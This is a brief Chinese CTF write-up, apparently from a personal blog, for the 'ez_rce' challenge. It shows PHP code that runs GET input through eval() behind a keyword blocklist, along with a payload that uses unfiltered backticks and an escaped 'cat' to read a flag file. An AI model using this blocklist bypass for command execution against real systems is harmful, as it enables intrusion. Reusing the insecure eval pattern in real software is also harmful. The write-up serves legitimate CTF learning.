[UUCTF 2022 新生赛]

ez_rce

<?php
## 放弃把，小伙子，你真的不会RCE,何必在此纠结呢？？？？？？？？？？？？
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
        echo '看看你输入的参数！！！不叫样子！！';echo '<br>';
        eval($code);
    }
    else{
        die("你想干什么？？？？？？？？？");
    }
}
else{
    echo "居然都不输入参数，可恶!!!!!!!!!";
    show_source(__FILE__);
}

首先看源码，发现过滤了许多参数，但是没有过滤``；

所以我们可以使用``来命令执行；

payload:?code=printf(`c\at /fffffffffflagafag`);

posted @ 2023-05-07 22:48 kode 阅读(373) 评论(0) 收藏举报

刷新页面返回顶部

Kode's Blog

花会沿路盛开，以后的路也是，所以要有未来。

[UUCTF 2022 新生赛]

ez_rce

公告